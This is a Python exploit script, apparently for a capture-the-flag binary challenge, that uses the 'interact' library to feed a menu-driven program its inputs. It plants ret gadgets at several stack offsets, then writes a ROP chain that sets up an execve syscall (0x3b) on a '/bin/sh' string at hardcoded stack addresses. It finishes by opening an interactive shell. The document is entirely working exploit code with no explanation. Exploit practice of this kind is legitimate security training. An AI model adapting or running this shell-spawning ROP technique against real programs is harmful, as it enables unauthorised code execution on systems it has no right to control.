import interact
import struct

# Pack integer 'n' into a 8-Byte representation
def p64(n):
    return struct.pack('Q', n)

# Unpack 8-Byte-long string 's' into a Python integer
def u64(s):
    return struct.unpack('Q', s)[0]

p = interact.Process()
print(p.readuntil("name"))
p.sendline("zamnzamn")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("1")
print(p.readuntil("at?"))
p.sendline("0")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("2")
print(p.readuntil("at?"))
p.sendline("16")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("3")
print(p.readuntil("at?"))
p.sendline("32")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("4")
print(p.readuntil("at?"))
p.sendline("48")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("5")
print(p.readuntil("at?"))
p.sendline("64")
print(p.readuntil("Choice:"))
p.sendline("1")
print(p.readuntil("Gadget: { ret }"))
p.sendline("6")
print(p.readuntil("at?"))
p.sendline("88")
print(p.readuntil("Choice:"))

p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("24")
print(p.readuntil("Hex):"))
p.sendline("0x0")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("40")
print(p.readuntil("Hex):"))
p.sendline("0x0")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("56")
print(p.readuntil("Hex):"))
p.sendline("0x3b")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("96")
print(p.readuntil("Hex):"))
p.sendline("0x7fffffffed80")
print(p.readuntil("Choice:"))

# point rdi to address with /bin/sh
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("80")
print(p.readuntil("Hex):"))
p.sendline("0x68732f6e69622f")
print(p.readuntil("Choice:"))
p.sendline("3")
print(p.readuntil("Index:"))
p.sendline("8")
print(p.readuntil("Hex):"))
p.sendline("0x7fffffffedd0")

p.interactive()
